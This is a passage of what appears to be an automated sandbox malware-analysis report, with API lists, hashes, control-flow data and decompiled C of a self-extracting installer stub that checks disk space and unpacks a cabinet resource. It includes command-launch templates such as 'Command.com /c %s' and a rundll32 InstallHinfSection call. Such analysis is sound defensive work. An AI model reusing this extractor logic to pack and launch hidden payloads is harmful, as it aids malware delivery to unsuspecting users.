                                                                                                                                                                                                        0x00e81d5b
                                                                                                                                                                                                        0x00e81d5d
                                                                                                                                                                                                        0x00e81d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81c1b
                                                                                                                                                                                                        0x00e81c1b
                                                                                                                                                                                                        0x00e81c20
                                                                                                                                                                                                        0x00e81c2c
                                                                                                                                                                                                        0x00e81c33
                                                                                                                                                                                                        0x00e81c38
                                                                                                                                                                                                        0x00e81c3a
                                                                                                                                                                                                        0x00e81c3a
                                                                                                                                                                                                        0x00e81c40
                                                                                                                                                                                                        0x00e81c4b
                                                                                                                                                                                                        0x00e81c4b
                                                                                                                                                                                                        0x00e81c5d
                                                                                                                                                                                                        0x00e81c61
                                                                                                                                                                                                        0x00e81dd4
                                                                                                                                                                                                        0x00e81dd4
                                                                                                                                                                                                        0x00e81dd6
                                                                                                                                                                                                        0x00e81ddb
                                                                                                                                                                                                        0x00e81ddc
                                                                                                                                                                                                        0x00e81dde
                                                                                                                                                                                                        0x00e81d64
                                                                                                                                                                                                        0x00e81d64
                                                                                                                                                                                                        0x00e81d67
                                                                                                                                                                                                        0x00e81d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81c67
                                                                                                                                                                                                        0x00e81c67
                                                                                                                                                                                                        0x00e81c6d
                                                                                                                                                                                                        0x00e81c72
                                                                                                                                                                                                        0x00e81c74
                                                                                                                                                                                                        0x00e81c74
                                                                                                                                                                                                        0x00e81c8e
                                                                                                                                                                                                        0x00e81c99
                                                                                                                                                                                                        0x00e81cc0
                                                                                                                                                                                                        0x00e81cf8
                                                                                                                                                                                                        0x00e81d07
                                                                                                                                                                                                        0x00e81d23
                                                                                                                                                                                                        0x00e81d09
                                                                                                                                                                                                        0x00e81d14
                                                                                                                                                                                                        0x00e81d1b
                                                                                                                                                                                                        0x00e81d1b
                                                                                                                                                                                                        0x00e81d2b
                                                                                                                                                                                                        0x00e81d2d
                                                                                                                                                                                                        0x00e81d2d
                                                                                                                                                                                                        0x00e81d38
                                                                                                                                                                                                        0x00e81d39
                                                                                                                                                                                                        0x00e81d46
                                                                                                                                                                                                        0x00e81cc2
                                                                                                                                                                                                        0x00e81cc2
                                                                                                                                                                                                        0x00e81ccc
                                                                                                                                                                                                        0x00e81cce
                                                                                                                                                                                                        0x00e81cce
                                                                                                                                                                                                        0x00e81cdb
                                                                                                                                                                                                        0x00e81ce6
                                                                                                                                                                                                        0x00e81cee
                                                                                                                                                                                                        0x00e81cee
                                                                                                                                                                                                        0x00e81e89
                                                                                                                                                                                                        0x00e81e91
                                                                                                                                                                                                        0x00e81e92
                                                                                                                                                                                                        0x00e81e94
                                                                                                                                                                                                        0x00e81e97
                                                                                                                                                                                                        0x00e81ea4
                                                                                                                                                                                                        0x00e81ea4
                                                                                                                                                                                                        0x00e81c61
                                                                                                                                                                                                        0x00e81c07
                                                                                                                                                                                                        0x00e81bd3
                                                                                                                                                                                                        0x00e81b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E81C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00E81C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00E81140,00000000,00000008,?), ref: 00E81CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00E81D1B
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2280873615
                                                                                                                                                                                                        • Opcode ID: 879b53380b5014ab32a4bc6bdfbd200a4d8b79a59e28bb2caeb59a4eddadec14
                                                                                                                                                                                                        • Instruction ID: 5d37c1aef25310143e636aec8a28085adb1cd2a2737901ba0f95be94b6d46849
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 879b53380b5014ab32a4bc6bdfbd200a4d8b79a59e28bb2caeb59a4eddadec14
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CA139B0A002145FEB20BB24CC45BEA77ADDB81714F1466D5E55DB32D1EBB09D8BCB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 e8597d-e859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 e859bb-e859d8 call e844b9 call e86285 324->325 326 e859dd-e85a1b GetDiskFreeSpaceA 324->326 345 e85c05-e85c14 call e86ce0 325->345 327 e85ba1-e85bde memset call e86285 GetLastError FormatMessageA 326->327 328 e85a21-e85a4a MulDiv 326->328 337 e85be3-e85bfc call e844b9 SetCurrentDirectoryA 327->337 328->327 331 e85a50-e85a6c GetVolumeInformationA 328->331 334 e85a6e-e85ab0 memset call e86285 GetLastError FormatMessageA 331->334 335 e85ab5-e85aca SetCurrentDirectoryA 331->335 334->337 339 e85acc-e85ad1 335->339 351 e85c02 337->351 343 e85ae2-e85ae4 339->343 344 e85ad3-e85ad8 339->344 349 e85ae6 343->349 350 e85ae7-e85af8 343->350 344->343 347 e85ada-e85ae0 344->347 347->339 347->343 349->350 353 e85af9-e85afb 350->353 354 e85c04 351->354 355 e85afd-e85b03 353->355 356 e85b05-e85b08 353->356 354->345 355->353 355->356 357 e85b0a-e85b1b call e844b9 356->357 358 e85b20-e85b27 356->358 357->351 360 e85b29-e85b33 358->360 361 e85b52-e85b5b 358->361 360->361 363 e85b35-e85b50 360->363 364 e85b62-e85b6d 361->364 363->364 365 e85b6f-e85b74 364->365 366 e85b76-e85b7d 364->366 367 e85b85 365->367 368 e85b7f-e85b81 366->368 369 e85b83 366->369 370 e85b96-e85b9f 367->370 371 e85b87-e85b94 call e8268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00E8597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xe89124 = E00E86285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00E844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xe89a34 & 0x00000008;
                                                                                                                                                                                                        							if(( *0xe89a34 & 0x00000008) == 0) {
                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                        								_t103 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        								_t110 =  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                        									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                        										__eflags = _t103 - _t116;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags = _t110 - _t116;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									 *0xe89124 = 0;
                                                                                                                                                                                                        									_t66 = 1;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t40 =  &_a4; // 0xe86277
                                                                                                                                                                                                        									_t66 = E00E8268B( *_t40, _t110, _t103,  &_v16);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t105 =  *0xe89a38; // 0x0
                                                                                                                                                                                                        							_t110 =  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xe889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                        							_t103 = (_t105 >> 2) +  *0xe89a38;
                                                                                                                                                                                                        							goto L21;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t110 = 0x4c5;
                                                                                                                                                                                                        						E00E844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E00E844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00E86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00e8597d
                                                                                                                                                                                                        0x00e85988
                                                                                                                                                                                                        0x00e8598f
                                                                                                                                                                                                        0x00e8599a
                                                                                                                                                                                                        0x00e859a6
                                                                                                                                                                                                        0x00e859a8
                                                                                                                                                                                                        0x00e859af
                                                                                                                                                                                                        0x00e859b9
                                                                                                                                                                                                        0x00e859dd
                                                                                                                                                                                                        0x00e859e4
                                                                                                                                                                                                        0x00e859f1
                                                                                                                                                                                                        0x00e859fe
                                                                                                                                                                                                        0x00e85a0b
                                                                                                                                                                                                        0x00e85a13
                                                                                                                                                                                                        0x00e85a19
                                                                                                                                                                                                        0x00e85a1b
                                                                                                                                                                                                        0x00e85ba1
                                                                                                                                                                                                        0x00e85baf
                                                                                                                                                                                                        0x00e85bbd
                                                                                                                                                                                                        0x00e85bd8
                                                                                                                                                                                                        0x00e85bde
                                                                                                                                                                                                        0x00e85be3
                                                                                                                                                                                                        0x00e85bec
                                                                                                                                                                                                        0x00e85bf0
                                                                                                                                                                                                        0x00e85bfc
                                                                                                                                                                                                        0x00e85c02
                                                                                                                                                                                                        0x00e85c02
                                                                                                                                                                                                        0x00e85c02
                                                                                                                                                                                                        0x00e85c04
                                                                                                                                                                                                        0x00e85c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85c04
                                                                                                                                                                                                        0x00e85a27
                                                                                                                                                                                                        0x00e85a3a
                                                                                                                                                                                                        0x00e85a46
                                                                                                                                                                                                        0x00e85a48
                                                                                                                                                                                                        0x00e85a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85a64
                                                                                                                                                                                                        0x00e85a6a
                                                                                                                                                                                                        0x00e85a6c
                                                                                                                                                                                                        0x00e85abc
                                                                                                                                                                                                        0x00e85ac2
                                                                                                                                                                                                        0x00e85ac9
                                                                                                                                                                                                        0x00e85aca
                                                                                                                                                                                                        0x00e85aca
                                                                                                                                                                                                        0x00e85acc
                                                                                                                                                                                                        0x00e85acc
                                                                                                                                                                                                        0x00e85acf
                                                                                                                                                                                                        0x00e85ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85ad3
                                                                                                                                                                                                        0x00e85ad6
                                                                                                                                                                                                        0x00e85ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85ada
                                                                                                                                                                                                        0x00e85adc
                                                                                                                                                                                                        0x00e85add
                                                                                                                                                                                                        0x00e85add
                                                                                                                                                                                                        0x00e85ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85ae0
                                                                                                                                                                                                        0x00e85ae2
                                                                                                                                                                                                        0x00e85ae4
                                                                                                                                                                                                        0x00e85ae6
                                                                                                                                                                                                        0x00e85ae6
                                                                                                                                                                                                        0x00e85ae6
                                                                                                                                                                                                        0x00e85ae9
                                                                                                                                                                                                        0x00e85aeb
                                                                                                                                                                                                        0x00e85af0
                                                                                                                                                                                                        0x00e85af6
                                                                                                                                                                                                        0x00e85af8
                                                                                                                                                                                                        0x00e85af9
                                                                                                                                                                                                        0x00e85af9
                                                                                                                                                                                                        0x00e85afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85afd
                                                                                                                                                                                                        0x00e85aff
                                                                                                                                                                                                        0x00e85b00
                                                                                                                                                                                                        0x00e85b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85b03
                                                                                                                                                                                                        0x00e85b05
                                                                                                                                                                                                        0x00e85b08
                                                                                                                                                                                                        0x00e85b20
                                                                                                                                                                                                        0x00e85b27
                                                                                                                                                                                                        0x00e85b52
                                                                                                                                                                                                        0x00e85b52
                                                                                                                                                                                                        0x00e85b5b
                                                                                                                                                                                                        0x00e85b62
                                                                                                                                                                                                        0x00e85b6b
                                                                                                                                                                                                        0x00e85b6d
                                                                                                                                                                                                        0x00e85b76
                                                                                                                                                                                                        0x00e85b7d
                                                                                                                                                                                                        0x00e85b83
                                                                                                                                                                                                        0x00e85b7f
                                                                                                                                                                                                        0x00e85b7f
                                                                                                                                                                                                        0x00e85b7f
                                                                                                                                                                                                        0x00e85b6f
                                                                                                                                                                                                        0x00e85b72
                                                                                                                                                                                                        0x00e85b72
                                                                                                                                                                                                        0x00e85b85
                                                                                                                                                                                                        0x00e85b98
                                                                                                                                                                                                        0x00e85b9e
                                                                                                                                                                                                        0x00e85b87
                                                                                                                                                                                                        0x00e85b8c
                                                                                                                                                                                                        0x00e85b8f
                                                                                                                                                                                                        0x00e85b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85b85
                                                                                                                                                                                                        0x00e85b29
                                                                                                                                                                                                        0x00e85b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85b35
                                                                                                                                                                                                        0x00e85b48
                                                                                                                                                                                                        0x00e85b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85b4a
                                                                                                                                                                                                        0x00e85b0f
                                                                                                                                                                                                        0x00e85b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85b16
                                                                                                                                                                                                        0x00e85a7c
                                                                                                                                                                                                        0x00e85a8a
                                                                                                                                                                                                        0x00e85aa5
                                                                                                                                                                                                        0x00e85aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e859bb
                                                                                                                                                                                                        0x00e859c0
                                                                                                                                                                                                        0x00e859c7
                                                                                                                                                                                                        0x00e859d1
                                                                                                                                                                                                        0x00e859d6
                                                                                                                                                                                                        0x00e85c05
                                                                                                                                                                                                        0x00e85c14
                                                                                                                                                                                                        0x00e85c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E859A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00E859AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00E85A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00E85A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E85A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E85A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E85A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00E85AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00E85BFC
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID: wb
                                                                                                                                                                                                        • API String ID: 4237285672-1758207633
                                                                                                                                                                                                        • Opcode ID: efcb1b1061b1a7245b5479fb176a3ef669503a787c4738486a8ea5a2f949d905
                                                                                                                                                                                                        • Instruction ID: 3faa8a5ec5c8bc7ff30befcb8619247626942081d7ebf362d0d2ec3f70f6df68
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efcb1b1061b1a7245b5479fb176a3ef669503a787c4738486a8ea5a2f949d905
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A71A3B290060CAFEB15EB65CC85BFB77ACEB48344F5451AAF54DF6140DA309E888B20
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 e84fe0-e8501a call e8468f FindResourceA LoadResource LockResource 377 e85020-e85027 374->377 378 e85161-e85163 374->378 379 e85029-e85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 e85057-e8505e call e84efd 377->380 379->380 383 e8507c-e850b4 380->383 384 e85060-e85077 call e844b9 380->384 389 e850e8-e85104 call e844b9 383->389 390 e850b6-e850da 383->390 388 e85107-e8510e 384->388 392 e8511d-e8511f 388->392 393 e85110-e85117 FreeResource 388->393 399 e85106 389->399 398 e850dc 390->398 390->399 396 e8513a-e85141 392->396 397 e85121-e85127 392->397 393->392 401 e8515f 396->401 402 e85143-e8514a 396->402 397->396 400 e85129-e85135 call e844b9 397->400 405 e850e3-e850e6 398->405 399->388 400->396 401->378 402->401 403 e8514c-e85159 SendMessageA 402->403 403->401 405->389 405->399
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00E84FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0xe89144 = E00E8468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xe89140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xe88584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xe88584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00E84EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00E84CA0, E00E84CC0, E00E84980, E00E84A50, E00E84AD0, E00E84B60, E00E84BC0, 1, 0xe89148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xe89148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xe88584; // 0x0
                                                                                                                                                                                                        						E00E844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
